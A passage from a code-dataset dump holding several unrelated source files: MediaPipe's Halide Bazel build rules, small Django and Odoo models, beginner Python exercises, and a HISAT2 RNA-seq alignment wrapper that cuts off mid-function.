ctx.actions.declare_directory(name) if is_dir else ctx.actions.declare_file(name)\n _add_output_file(f, fmt, output_files, output_dict, verbose_extra_outputs, verbose_output_paths)\n else:\n name = \"%s.%s\" % (ctx.attr.filename, ext)\n f = ctx.actions.declare_directory(name) if is_dir else ctx.actions.declare_file(name)\n _add_output_file(f, fmt, output_files, output_dict, verbose_extra_outputs, verbose_output_paths)\n\n # --- Progress message(s), including log info about any 'extra' files being output due to --define halide_extra_output\n progress_message = \"Executing generator %s with target (%s) args (%s).\" % (\n generator_name_,\n \",\".join(halide_targets),\n \" \".join(generator_params),\n )\n\n for f in output_files:\n if any([f.path.endswith(suf) for suf in [\".h\", \".a\", \".o\", \".lib\", \".registration.cpp\", \".bc\", \".halide_compiler_log\"]]):\n continue\n\n # If an extra output was specified via --define halide_extra_outputs=foo on the command line,\n # add to the progress message (so that it is ephemeral and doesn't clog stdout).\n #\n # (Trailing space is intentional since Starlark will append a period to the end,\n # making copy-n-paste harder than it might otherwise be...)\n if not be_very_quiet:\n extra_msg = \"Emitting extra Halide output: %s \" % f.path\n progress_message += \"\\n\" + extra_msg\n if f.path in verbose_output_paths:\n # buildifier: disable=print\n print(extra_msg)\n\n # --- Construct the arguments list for the Generator\n arguments = ctx.actions.args()\n arguments.add(\"-o\", output_files[0].dirname)\n if ctx.attr.generate_runtime:\n arguments.add(\"-r\", leaf_name)\n if len(halide_targets) > 1:\n fail(\"Only one halide_target allowed when using generate_runtime\")\n if function_name:\n fail(\"halide_function_name not allowed when using generate_runtime\")\n else:\n arguments.add(\"-g\", generator_name_)\n arguments.add(\"-n\", leaf_name)\n if function_name:\n arguments.add(\"-f\", function_name)\n\n if requested_outputs:\n arguments.add_joined(\"-e\", requested_outputs, join_with = \",\")\n\n # Can't use add_joined(), as it will insert a space after target=\n arguments.add(\"target=%s\" % (\",\".join(halide_targets)))\n if generator_params:\n for p in generator_params:\n for s in [\"target\"]:\n if p.startswith(\"%s=\" % s):\n fail(\"You cannot specify %s in the generator_params parameter in bazel.\" % s)\n arguments.add_all(generator_params)\n\n show_gen_arg = ctx.var.get(\"halide_show_generator_command\", \"\")\n\n # If it's an exact match of a fully qualified path, show just that one.\n # If it's * or \"all\", match everything.\n if library_name and show_gen_arg in [library_name, \"all\", \"*\"] and not ctx.attr.generate_runtime:\n # The 'Args' object can be printed, but can't be usefully converted to a string, or iterated,\n # so we'll reproduce the logic here. We'll also take the opportunity to add or augment\n # some args to be more useful to whoever runs it (eg, add `-v=1`, add some output files).\n sg_args = [\"-v\", \"1\"]\n sg_args += [\"-o\", \"/tmp\"]\n sg_args += [\"-g\", generator_name_]\n sg_args += [\"-n\", leaf_name]\n if function_name:\n sg_args += [\"-f\", function_name]\n if requested_outputs:\n # Ensure that several commonly-useful output are added\n ro = sorted(collections.uniq(requested_outputs + [\"stmt\", \"assembly\", \"llvm_assembly\"]))\n sg_args += [\"-e\", \",\".join(ro)]\n sg_args.append(\"target=%s\" % (\",\".join(halide_targets)))\n\n if generator_params:\n sg_args += generator_params\n\n # buildifier: disable=print\n print(\n \"\\n\\nTo locally run the Generator for\",\n library_name,\n \"use the command:\\n\\n\",\n \"bazel run -c opt\",\n generator_binary.label,\n \"--\",\n \" \".join(sg_args),\n \"\\n\\n\",\n )\n\n # Finally... run the Generator.\n ctx.actions.run(\n execution_requirements = execution_requirements,\n arguments = [arguments],\n env = env,\n executable = generator_binary.files_to_run.executable,\n mnemonic = \"ExecuteHalideGenerator\",\n inputs = depset(direct = inputs),\n outputs = output_files,\n progress_message = progress_message,\n exec_group = \"generator\",\n )\n\n return [\n DefaultInfo(files = depset(direct = output_files)),\n OutputGroupInfo(**output_dict),\n ]\n\n_gengen = rule(\n implementation = _gengen_impl,\n attrs = {\n \"consider_halide_extra_outputs\": attr.bool(),\n \"filename\": attr.string(),\n \"generate_runtime\": attr.bool(default = False),\n \"generator_binary\": attr.label(\n cfg = \"exec\",\n providers = [HalideGeneratorBinaryInfo],\n ),\n # \"generator_name\" is apparently reserved by Bazel for attrs in rules\n \"generator_name_\": attr.label(\n cfg = \"exec\",\n providers = [HalideGeneratorNameInfo],\n ),\n \"halide_base_target\": attr.string(),\n \"function_name\": attr.label(\n cfg = \"target\",\n providers = [\n HalideFunctionNameInfo,\n ],\n ),\n \"generator_params\": attr.label(\n cfg = \"target\",\n providers = [\n HalideGeneratorParamsInfo,\n ],\n ),\n \"library_name\": attr.label(\n cfg = \"target\",\n providers = [\n HalideLibraryNameInfo,\n ],\n ),\n \"target_features\": attr.label(\n cfg = \"target\",\n providers = [\n HalideTargetFeaturesInfo,\n ],\n ),\n \"halide_target_map\": attr.string_list_dict(),\n \"requested_outputs\": attr.string_list(),\n \"_cc_toolchain\": attr.label(default = \"@bazel_tools//tools/cpp:current_cc_toolchain\"),\n },\n fragments = [\"cpp\"],\n output_to_genfiles = True,\n toolchains = use_cpp_toolchain(),\n exec_groups = {\n \"generator\": exec_group(),\n },\n)\n\ndef _add_target_features(target, features):\n if \",\" in target:\n fail(\"Cannot use multitarget here\")\n new_target = target.split(\"-\")\n for f in features:\n if f and f not in new_target:\n new_target.append(f)\n return \"-\".join(new_target)\n\ndef _add_features_to_all(halide_targets, features):\n return [_canonicalize_target(_add_target_features(t, features)) for t in halide_targets]\n\ndef _has_dupes(some_list):\n clean = collections.uniq(some_list)\n return sorted(some_list) != sorted(clean)\n\n# Target features which do not affect runtime compatibility.\n_IRRELEVANT_FEATURES = collections.uniq([\n \"arm_dot_prod\",\n \"arm_fp16\",\n \"c_plus_plus_name_mangling\",\n \"check_unsafe_promises\",\n \"embed_bitcode\",\n \"enable_llvm_loop_opt\",\n \"large_buffers\",\n \"no_asserts\",\n \"no_bounds_query\",\n \"profile\",\n \"strict_float\",\n \"sve\",\n \"sve2\",\n \"trace_loads\",\n \"trace_pipeline\",\n \"trace_realizations\",\n \"trace_stores\",\n \"user_context\",\n \"wasm_sat_float_to_int\",\n \"wasm_signext\",\n \"wasm_simd128\",\n])\n\ndef _discard_irrelevant_features(halide_target_features = []):\n return sorted(collections.uniq([f for f in halide_target_features if f not in _IRRELEVANT_FEATURES]))\n\ndef _halide_library_runtime_target_name(halide_target_features = []):\n return \"_\".join([\"halide_library_runtime\"] + _discard_irrelevant_features(halide_target_features))\n\ndef _define_halide_library_runtime(\n halide_target_features = [],\n compatible_with = []):\n target_name = _halide_library_runtime_target_name(halide_target_features)\n\n if not native.existing_rule(\"halide_library_runtime.generator\"):\n halide_generator(\n name = \"halide_library_runtime.generator\",\n srcs = [],\n deps = [],\n visibility = [\"//visibility:private\"],\n )\n condition_deps = {}\n for base_target, cfgs in _HALIDE_TARGET_CONFIG_SETTINGS_MAP.items():\n target_features = _discard_irrelevant_features(halide_target_features)\n halide_target_name = _halide_target_to_bazel_rule_name(base_target)\n gengen_name = \"%s_%s\" % (halide_target_name, target_name)\n\n _halide_library_instance(\n name = \"%s.library_instance\" % gengen_name,\n compatible_with = compatible_with,\n function_name = \"\",\n generator_closure = \":halide_library_runtime.generator_closure\",\n generator_params = [],\n library_name = \"\",\n target_features = target_features,\n visibility = [\"//visibility:private\"],\n )\n hl_instance = \":%s.library_instance\" % gengen_name\n\n _gengen(\n name = gengen_name,\n compatible_with = compatible_with,\n filename = \"%s/%s\" % (halide_target_name, target_name),\n generate_runtime = True,\n generator_binary = hl_instance,\n generator_name_ = hl_instance,\n halide_base_target = base_target,\n requested_outputs = [\"object\"],\n tags = [\"manual\"],\n target_features = hl_instance,\n visibility = [\"@halide//:__subpackages__\"],\n )\n for cfg in cfgs:\n condition_deps[cfg] = [\":%s\" % gengen_name]\n\n deps = []\n native.cc_library(\n name = target_name,\n compatible_with = compatible_with,\n srcs = select(condition_deps),\n linkopts = halide_runtime_linkopts(),\n tags = [\"manual\"],\n deps = deps,\n visibility = [\"//visibility:public\"],\n )\n\n return target_name\n\ndef _standard_library_runtime_features():\n _standard_features = [\n [],\n [\"cuda\"],\n [\"metal\"],\n [\"opencl\"],\n [\"openglcompute\"],\n [\"openglcompute\", \"egl\"],\n ]\n return [f for f in _standard_features] + [f + [\"debug\"] for f in _standard_features]\n\ndef _standard_library_runtime_names():\n return collections.uniq([_halide_library_runtime_target_name(f) for f in _standard_library_runtime_features()])\n\ndef halide_library_runtimes(compatible_with = []):\n unused = [\n _define_halide_library_runtime(f, compatible_with = compatible_with)\n for f in _standard_library_runtime_features()\n ]\n unused = unused # unused variable\n\ndef halide_generator(\n name,\n srcs,\n compatible_with = [],\n copts = [],\n deps = [],\n generator_name = \"\",\n includes = [],\n tags = [],\n testonly = False,\n visibility = None):\n if not name.endswith(\".generator\"):\n fail(\"halide_generator rules must end in .generator\")\n\n basename = name[:-10] # strip \".generator\" suffix\n if not generator_name:\n generator_name = basename\n\n # Note: This target is public, but should not be needed by the vast\n # majority of users. Unless you are writing a custom Bazel rule that\n # involves Halide generation, you most probably won't need to depend on\n # this rule.\n native.cc_binary(\n name = name,\n copts = copts + halide_language_copts(),\n linkopts = halide_language_linkopts(),\n compatible_with = compatible_with,\n srcs = srcs,\n deps = [\n \"@halide//:gengen\",\n \"@halide//:language\",\n ] + deps,\n tags = [\"manual\"] + tags,\n testonly = testonly,\n visibility = [\"//visibility:public\"],\n )\n\n _gengen_closure(\n name = \"%s_closure\" % name,\n generator_binary = name,\n generator_name_ = generator_name,\n compatible_with = compatible_with,\n testonly = testonly,\n visibility = [\"//visibility:private\"],\n )\n\n# This rule exists to allow us to select() on halide_target_features.\ndef _select_halide_library_runtime_impl(ctx):\n f = ctx.attr.halide_target_features\n\n standard_runtimes = {t.label.name: t for t in ctx.attr._standard_runtimes}\n\n f = sorted(_discard_irrelevant_features(collections.uniq(f)))\n runtime_name = _halide_library_runtime_target_name(f)\n if runtime_name not in standard_runtimes:\n fail((\"There is no Halide runtime available for the feature set combination %s. \" +\n \"Please use contact information from halide-lang.org to contact the Halide \" +\n \"team to add the right combination.\") % str(f))\n\n return standard_runtimes[runtime_name][CcInfo]\n\n_select_halide_library_runtime = rule(\n implementation = _select_halide_library_runtime_impl,\n attrs = {\n \"halide_target_features\": attr.string_list(),\n \"_standard_runtimes\": attr.label_list(\n default = [\"@halide//:%s\" % n for n in _standard_library_runtime_names()],\n providers = [CcInfo],\n ),\n },\n provides = [CcInfo],\n)\n\ndef halide_library_from_generator(\n name,\n generator,\n add_halide_runtime_deps = True,\n compatible_with = [],\n deps = [],\n function_name = None,\n generator_params = [],\n halide_target_features = [],\n halide_target_map = halide_library_default_target_map(),\n includes = [],\n namespace = None,\n tags = [],\n testonly = False,\n visibility = None):\n if not function_name:\n function_name = name\n\n if namespace:\n function_name = \"%s::%s\" % (namespace, function_name)\n\n generator_closure = \"%s_closure\" % generator\n\n _halide_library_instance(\n name = \"%s.library_instance\" % name,\n compatible_with = compatible_with,\n function_name = function_name,\n generator_closure = generator_closure,\n generator_params = generator_params,\n library_name = \"//%s:%s\" % (native.package_name(), name),\n target_features = halide_target_features,\n testonly = testonly,\n visibility = [\"//visibility:private\"],\n )\n hl_instance = \":%s.library_instance\" % name\n\n condition_deps = {}\n for base_target, cfgs in _HALIDE_TARGET_CONFIG_SETTINGS_MAP.items():\n base_target_name = _halide_target_to_bazel_rule_name(base_target)\n gengen_name = \"%s_%s\" % (base_target_name, name)\n _gengen(\n name = gengen_name,\n compatible_with = compatible_with,\n consider_halide_extra_outputs = True,\n filename = \"%s/%s\" % (base_target_name, name),\n function_name = hl_instance,\n generator_binary = generator_closure,\n generator_name_ = generator_closure,\n generator_params = hl_instance,\n halide_base_target = base_target,\n halide_target_map = halide_target_map,\n library_name = hl_instance,\n requested_outputs = [\"static_library\"],\n tags = [\"manual\"] + tags,\n target_features = hl_instance,\n testonly = testonly,\n )\n for cfg in cfgs:\n condition_deps[cfg] = [\":%s\" % gengen_name]\n\n # Use a canonical target to build CC, regardless of config detected\n cc_base_target = \"x86-64-linux\"\n\n for output, target_name in [\n (\"c_header\", \"%s_h\" % name),\n (\"c_source\", \"%s_cc\" % name),\n ]:\n _gengen(\n name = target_name,\n compatible_with = compatible_with,\n filename = name,\n function_name = hl_instance,\n generator_binary = generator_closure,\n generator_name_ = generator_closure,\n generator_params = hl_instance,\n halide_base_target = cc_base_target,\n library_name = hl_instance,\n requested_outputs = [output],\n tags = [\"manual\"] + tags,\n target_features = hl_instance,\n testonly = testonly,\n )\n\n _select_halide_library_runtime(\n name = \"%s.halide_library_runtime_deps\" % name,\n halide_target_features = halide_target_features,\n compatible_with = compatible_with,\n tags = tags,\n visibility = [\"//visibility:private\"],\n )\n\n native.filegroup(\n name = \"%s_object\" % name,\n srcs = select(condition_deps),\n output_group = \"generated_object\",\n visibility = [\"//visibility:private\"],\n compatible_with = compatible_with,\n tags = tags,\n testonly = testonly,\n )\n\n native.cc_library(\n name = name,\n srcs = [\"%s_object\" % name],\n hdrs = [\n \":%s_h\" % name,\n ],\n deps = deps +\n [\"@halide//:runtime\"] + # for HalideRuntime.h, etc\n ([\":%s.halide_library_runtime_deps\" % name] if add_halide_runtime_deps else []), # for the runtime implementation\n defines = [\"HALIDE_FUNCTION_ATTRS=HALIDE_MUST_USE_RESULT\"],\n compatible_with = compatible_with,\n includes = includes,\n tags = tags,\n testonly = testonly,\n visibility = visibility,\n linkstatic = 1,\n )\n\n # Return the fully-qualified built target name.\n return \"//%s:%s\" % (native.package_name(), name)\n\ndef halide_library(\n name,\n srcs = [],\n add_halide_runtime_deps = True,\n copts = [],\n compatible_with = [],\n filter_deps = [],\n function_name = None,\n generator_params = [],\n generator_deps = [],\n generator_name = None,\n halide_target_features = [],\n halide_target_map = halide_library_default_target_map(),\n includes = [],\n namespace = None,\n tags = [],\n testonly = False,\n visibility = None):\n if not srcs and not generator_deps:\n fail(\"halide_library needs at least one of srcs or generator_deps to provide a generator\")\n\n halide_generator(\n name = \"%s.generator\" % name,\n srcs = srcs,\n compatible_with = compatible_with,\n generator_name = generator_name,\n deps = generator_deps,\n includes = includes,\n copts = copts,\n tags = tags,\n testonly = testonly,\n visibility = visibility,\n )\n\n return halide_library_from_generator(\n name = name,\n generator = \":%s.generator\" % name,\n add_halide_runtime_deps = add_halide_runtime_deps,\n compatible_with = compatible_with,\n deps = filter_deps,\n function_name = function_name,\n generator_params = generator_params,\n halide_target_features = halide_target_features,\n halide_target_map = halide_target_map,\n includes = includes,\n namespace = namespace,\n tags = tags,\n testonly = testonly,\n visibility = visibility,\n )\n","repo_name":"google/mediapipe","sub_path":"third_party/halide/halide.bzl","file_name":"halide.bzl","file_ext":"bzl","file_size_in_byte":31441,"program_lang":"python","lang":"en","doc_type":"code","stars":23977,"dataset":"github-code","pt":"31"} +{"seq_id":"16641465179","text":"from django.db import models\n\nfrom django_extensions.db.models import TimeStampedModel\n\n\nclass Ad(TimeStampedModel):\n TOP = 'top'\n BOTTOM = 'bottom'\n POSITION_CHOICES = (\n (TOP, 'Top'),\n (BOTTOM, 'Bottom'),\n )\n\n description = models.CharField(max_length=255, null=True, blank=True)\n code = models.TextField()\n position = models.CharField(max_length=10,\n null=True,\n blank=True,\n choices=POSITION_CHOICES)\n\n def __unicode__(self):\n return self.description","repo_name":"rwestergren/docker-compose-tor-demo","sub_path":"youtubeadl/apps/core/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"31"} +{"seq_id":"72446981527","text":"#Ejercicio 13\n#Escriba un programa que permita que el usuario ingrese un\n#número a y una tupla t. Luego el programa debe mostrar por pantalla\n#la cantidad de veces que aparece el número a en la tupla t.\n\n\nn = int(input(\"Ingrese la cantidad de elementos en la tupla t: \"))\n\nt = ()\nfor i in range(n):\n\tnum = int(input(\"Ingrese un numero a la tupla: \"))\n\tt += (num,)\n\na = int(input(\"Ingrese el numero a contar la cantidad de veces que aparece en la tupla: \"))\n\nprint(\"El numero buscado aparece\", t.count(a), \"veces\")","repo_name":"Kindue/Python-Argentina-Programa","sub_path":"Unidad 3/3.1 Tuplas/Actividades a entregar/Ejercicio13.py","file_name":"Ejercicio13.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"3914211521","text":"# 문제 https://www.acmicpc.net/problem/1920\n# 두번 품 \nn = int(input())\nA = set(map(int,input().split()))\n\nm = int(input())\nB = list(map(int,input().split()))\n\nfor i in B:\n if i in A:\n print(\"1\")\n else:\n print(\"0\")\n\n\n# 이진 탐색 사용한 다른 풀이 \nn = int(input())\n\ndataA = list(map(int,input().split()))\n\ndataA.sort()\n\nm = int(input())\n\ndataB = list(map(int, input().split()))\n\ndef binary_search(array, target, start ,end):\n while start <= end:\n mid = (start + end) // 2\n if dataA[mid] == target:\n return mid\n elif dataA[mid] < target:\n start = mid + 1 \n else: \n end = mid - 1 \n return None\n\nfor i in dataB:\n result = binary_search(dataA, i, 0, n-1)\n if result == None:\n print(0)\n else:\n print(1)\n\n\n","repo_name":"pjw5521/Coding_Test_Algorithm","sub_path":"Baekjoon_Algorithm/5. Binary Search/1920 수찾기.py","file_name":"1920 수찾기.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"71175868569","text":"def prime_factorization(n):\n dict = {}\n list = []\n number = n\n divider = 2\n\n while number != 1:\n if int(number) % divider == 0:\n if not divider in dict:\n dict[divider] = 0\n dict[divider] += 1\n number /= divider\n divider = 2\n else:\n divider += 1\n\n for k, v in dict.items():\n list.append((k, v))\n\n return list\n\n\ntests = [\n (2, [(2, 1)]),\n (4, [(2, 2)]),\n (10, [(2, 1), (5, 1)]), # This is 2^1 * 5^1\n (14, [(2, 1), (7, 1)]),\n (356, [(2, 2), (89, 1)]),\n (89, [(89, 1)]), # 89 is a prime number\n (1000, [(2, 3), (5, 3)])\n]\n\n\nfor n, expected in tests:\n if expected == prime_factorization(n):\n print(True)\n else:\n print(False)\n","repo_name":"iliyannm/Python-101-Forever","sub_path":"Python Basics/C01P13/Integer prime factorization.py","file_name":"Integer prime factorization.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35605359844","text":"from django.urls import path\n\nfrom . import views\n\napp_name= 'squirrels'\n\nurlpatterns = [\n path('', views.IndexView.as_view(), name='index'),\n path('secret', views.SecretView.as_view(), name='secret'),\n path('newuser', views.signup, name='newuser'),\n path('redeem', views.RedeemView.as_view(), name='redeem'),\n path('leaderboard', views.LeaderboardView.as_view(), name='leaderboard'),\n path('cyoa', views.cyoa, name='cyoa'),\n path('article1', views.Article1View.as_view(), name='tree'),\n path('article2', views.Article2View.as_view(), name='tail'),\n path('article3', views.Article3View.as_view(), name='nuts'),\n path('article4', views.Article4View.as_view(), name='sqrl'),\n path('TAIL', views.TAIL, name='tail_layer'),\n path('TREE', views.TREE, name='tree_layer'),\n path('NUTS', views.NUTS, name='nuts_layer'),\n path('SQRL', views.SQRL, name='sqrl_layer'),\n path('chatter', views.chatter, name='chatter'),\n path('WATCHING', views.watching, name='watching'),\n path('SQRLDATABASE', views.sqrldatabase, name='sqrldatabase'),\n path('WINRARNOTFOUND', views.winrarnotfound, name='winrarnotfound'),\n path('WHOLEHEARTEDLY', views.wholeheartedly, name='wholeheartedly'),\n path('FLOWERS', views.flowers, name='flowers'),\n path('CRACKTHENUT', views.crackthenut, name='crackthenut'),\n]","repo_name":"AnonMuk/casesquirrels","sub_path":"casesquirrels/squirrelsite/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1336,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"9018244415","text":"# -*- coding: utf-8 -*-\n\nfrom odoo import models, fields, api\nfrom odoo.exceptions import UserError, ValidationError\n\nclass guiaecoworld(models.Model):\n _name = 'guiaeco.clientes'\n _inherits = {'res.partner': 'partner_id'}\n\n partner_id = fields.Many2one('res.partner', domain=[('is_company', '=', True)], required=True, ondelete=\"restrict\")\n activo = fields.Boolean(string=\"Activado en Guía?\")\n especialidad = fields.Char(string=\"Especialidad\")\n mapaG = fields.Char(string=\"Mapa Google\")\n mapaEmbed = fields.Char(string=\"Mapa Embed\", help=\"Añadir solo codigo embed, despues de 'pb='\")\n imagenPlaca = fields.Binary(string=\"Foto con Placa\")\n cabecera = fields.Binary(string=\"Imagen de cabecera\")\n fechaIncorporacion = fields.Date(string=\"Fecha Incorporación a Guía\", required=True)\n","repo_name":"juanjocop/CustomModulosOdoo","sub_path":"guiaecoworld/models/guia_ecoworld.py","file_name":"guia_ecoworld.py","file_ext":"py","file_size_in_byte":814,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"12375205713","text":"import os\nfrom external_cmd import TimedExternalCmd\nfrom defaults import *\nfrom utils import *\n\nFORMAT = '%(levelname)s %(asctime)-15s %(name)-20s %(message)s'\nlogFormatter = logging.Formatter(FORMAT)\nlogger = logging.getLogger(__name__)\nconsoleHandler = logging.StreamHandler()\nconsoleHandler.setFormatter(logFormatter)\nlogger.addHandler(consoleHandler)\n\n\ndef run_hisat2(align_idx=None,\n seq_1=\"\", seq_2=\"\", seq_u=\"\",\n seq_sra=\"\", ref_gtf=\"\", \n hisat2_opts=\"\", hisat2=HISAT2, hisat2_sps=HISAT2_SPS,\n samtools=SAMTOOLS,\n start=0, sample= \"\", nthreads=1,\n workdir=None, outdir=None, timeout=TIMEOUT):\n\n logger.info(\"Running alignment (HISAT2) for %s\"%sample)\n if not os.path.exists(align_idx+\".1.ht2\"):\n logger.error(\"Aborting!\")\n raise Exception(\"No HISAT index file %s.1.ht2\"%align_idx)\n \n if seq_1 and seq_2:\n for s1 in seq_1.split(\",\"):\n if not os.path.exists(s1):\n logger.error(\"Aborting!\")\n raise Exception(\"No Mate 1 sequence file %s\"%s1)\n for s2 in seq_2.split(\",\"):\n if not os.path.exists(s2):\n logger.error(\"Aborting!\")\n raise Exception(\"No Mate 2 sequence file %s\"%s2)\n seq_argument=\"-1 %s -2 %s\"%(seq_1,seq_2)\n elif seq_u:\n seq_argument=\"-U %s\"%(seq_u)\n for su in seq_u.split(\",\"):\n if not os.path.exists(su):\n logger.error(\"Aborting!\")\n raise Exception(\"No unpaired sequence file %s\"%su)\n\n elif seq_sra:\n seq_argument=\"--sra-acc %s\"%(seq_sra)\n for sr in seq_sra.split(\",\"):\n if not os.path.exists(sr):\n logger.error(\"Aborting!\")\n raise Exception(\"No sra sequence file %s\"%sr)\n\n\n work_hisat2=os.path.join(workdir,\"hisat2\",sample)\n create_dirs([work_hisat2])\n \n step=0\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n msg = \"Erase HISAT2 work directory for %s\"%sample\n command=\"rm -rf %s/*\" % (\n work_hisat2)\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=False)\n retcode = cmd.run(msg=msg,timeout=timeout)\n step+=1\n\n hisat2_log = os.path.join(work_hisat2, \"hisat2.log\")\n hisat2_log_fd = open(hisat2_log, \"w\")\n \n ksps = \"\"\n msg = \"Prepare known-splicesites for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n if ref_gtf:\n if not os.path.exists(ref_gtf):\n logger.error(\"Aborting!\")\n raise Exception(\"No reference GTF file %s\"%ref_gtf)\n else:\n ksps = ref_gtf.strip() + \"known-splicesite.txt\"\n if os.path.exists(ksps):\n logger.info(\"Will use the precomputed %s as --known-splicesite-infile for HISAT2\"%ksps)\n else:\n msg=\"compute --known-splicesite-infile for HISAT2\"\n ksps = os.path.join(work_hisat2, \"known-splicesite.txt\")\n ksps_fd = open(ksps, \"w\")\n \n command=\"%s %s\" % (hisat2_sps,ref_gtf)\n command=\"bash -c \\\"%s\\\"\"%command\n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=ksps_fd, msg=msg, timeout=timeout)\n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n \n\n \n if \"--dta \" not in hisat2_opts:\n hisat2_opts += \" --dta\"\n if \"--rg-id \" not in hisat2_opts:\n hisat2_opts += \" --rg-id hisat2\"\n if \"--rg \" not in hisat2_opts:\n hisat2_opts += \" --rg SM:%s\"%sample\n if \"--threads \" not in hisat2_opts:\n hisat2_opts += \" --threads %d\"%nthreads \n if ksps:\n hisat2_opts += \" --known-splicesite-infile %s\"%ksps\n\n msg = \"HISAT2 for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n command=\"%s %s -x %s %s -S %s/alignments.sam --novel-splicesite-outfile %s/splicesites.tab\" % (\n hisat2, hisat2_opts, align_idx, seq_argument,work_hisat2, work_hisat2 )\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n\n msg = \"converting SAM to BAM for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n command=\"%s view -Su %s/alignments.sam -@ %d -o %s/alignments.bam\" % (\n samtools, work_hisat2, nthreads, work_hisat2)\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n\n msg = \"sorting BAM for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n command=\"%s sort -@ %d -T %s/alignments.sorted -o %s/alignments.sorted.bam %s/alignments.bam \" % (\n samtools, nthreads, work_hisat2, work_hisat2, work_hisat2)\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n \n\n\n msg = \"Converting junctions to BED for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n command=\"hisat2_jun2bed.py %s/splicesites.tab %s/splicesites.bed \" % (\n work_hisat2, work_hisat2)\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n\n msg = \"Clean temp alignment files for %s\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n command=\"rm %s/alignments.sam %s/alignments.bam\" % (work_hisat2, work_hisat2)\n command=\"bash -c \\\"%s\\\"\"%command \n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout)\n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n\n\n out_hisat2=os.path.join(outdir,\"hisat2\",sample)\n create_dirs([out_hisat2])\n msg=\"Copy predictions to output directory for %s.\"%sample\n if start<=step:\n logger.info(\"--------------------------STEP %s--------------------------\"%step)\n if os.path.exists(\"%s/alignments.sorted.bam\"%work_hisat2) and \\\n os.path.exists(\"%s/splicesites.tab\"%work_hisat2) and \\\n os.path.exists(\"%s/splicesites.bed\"%work_hisat2):\n command = \"cp %s/alignments.sorted.bam %s/alignments.sorted.bam\"%(\n work_hisat2, out_hisat2)\n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n command = \"cp %s/splicesites.tab %s/splicesites.tab\"%(\n work_hisat2, out_hisat2)\n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n command = \"cp %s/splicesites.bed %s/splicesites.bed\"%(\n work_hisat2, out_hisat2)\n cmd = TimedExternalCmd(command, logger, raise_exception=True)\n retcode = cmd.run(cmd_log_fd_out=hisat2_log_fd, cmd_log=hisat2_log, msg=msg, timeout=timeout) \n else:\n logger.info(\"Skipping step %d: %s\"%(step,msg))\n step+=1\n\n\n\n alignments_bam = \"\"\n junctions_tab = \"\"\n junctions_bed = \"\"\n if os.path.exists(\"%s/alignments.sorted.bam\"%out_hisat2):\n logger.info(\"HISAT2 was successfull!\")\n logger.info(\"Output alignment: %s/alignments.sorted.bam\"%out_hisat2)\n logger.info(\"Output junction tab: %s/splicesites.tab\"%out_hisat2)\n logger.info(\"Output junction bed: %s/splicesites.bed\"%out_hisat2)\n alignments_bam = \"%s/alignments.sorted.bam\"%out_hisat2 \n junctions_tab = \"%s/splicesites.tab\"%out_hisat2 \n junctions_bed = \"%s/splicesites.bed\"%out_hisat2 \n else: \n logger.info(\"HISAT2 failed!\")\n return alignments_bam,junctions_tab,junctions_bed\n\ndef run_sr_align(sr_aligner=\"HISAT2\", align_idx=None,\n seq_1=\"\", seq_2=\"\", seq_u=\"\",\n seq_sra=\"\", ref_gtf=\"\", \n hisat2_opts=\"\", hisat2=HISAT2, hisat2_sps=HISAT2_SPS,\n samtools=SAMTOOLS,\n 